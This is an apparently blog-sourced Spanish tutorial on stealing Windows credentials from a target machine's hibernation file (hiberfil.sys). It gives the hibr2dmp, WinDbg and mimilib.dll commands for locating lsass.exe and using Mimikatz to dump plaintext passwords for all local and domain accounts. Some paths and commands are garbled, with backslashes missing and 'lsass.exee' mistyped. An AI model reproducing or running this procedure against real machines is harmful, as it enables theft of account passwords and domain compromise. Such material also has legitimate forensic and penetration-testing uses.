Mimikatz, una herramienta que permite extraer las credenciales de Windows como texto sin formato de LSA, está disponible desde 2012. Sin embargo, además de una característica bien cubierta de recuperar contraseñas de la memoria de un sistema operativo en ejecución, tiene otra capacidad interesante. Además, se proporcionan instrucciones paso a paso sobre cómo extraer fácilmente los datos de las credenciales de los usuarios de Windows del archivo hiberfil.sys.
Preparación
Para seguir estas instrucciones, necesitaremos las siguientes herramientas:
- Herramientas de depuración para Windows (WinDbg)
- Kit de herramientas de memoria de Windows edición gratuita
- Y el mismo mimikatz
Instrucciones
- Obtenga hiberfil.sys de la máquina de destino.
- Conviértalo a un formato con el que WinDbg pueda trabajar: hibr2dmp.exe
d:temphiberfil.sys c:temphiberfil.dmpPuede llevar algo de tiempo (en nuestro ejemplo, tomó alrededor de 14 horas).
- Ejecute WinDbg y abra el archivo que obtuvo en el paso anterior.Archivo -> Abrir Crash Dump
- Configure los símbolos de depuración. Archivo -> Ruta del archivo de símbolo … e ingrese la siguiente línea:
SRV*c:symbols*http://msdl.microsoft.com/download/symbolsPuede especificar cualquier otro directorio en el que se descargarán los símbolos en lugar de c: símbolos
Escriba lo siguiente en el símbolo del sistema del depurador:
Espere hasta que se complete la descarga del símbolo:

- Especifique la ruta a mimilib.dll. (Se encuentra en el mismo directorio que mimikatz).
0: kd> .load z:SftSecurityPasswordMimikatzx64mimilib.dll

- Busque la dirección de lsass.exe.
0: kd> !process 0 0 lsass.exee
En nuestro caso la dirección es la siguiente: fffffa800a7d9060.
- Cambie el contexto del proceso.
0: kd> .process /r /p fffffa800a7d9060

- Ejecute mimikatz y obtenga contraseñas de texto simple.

De esta forma puede extraer del archivo de hibernación las contraseñas de todas las cuentas locales y de dominio registradas en el sistema.





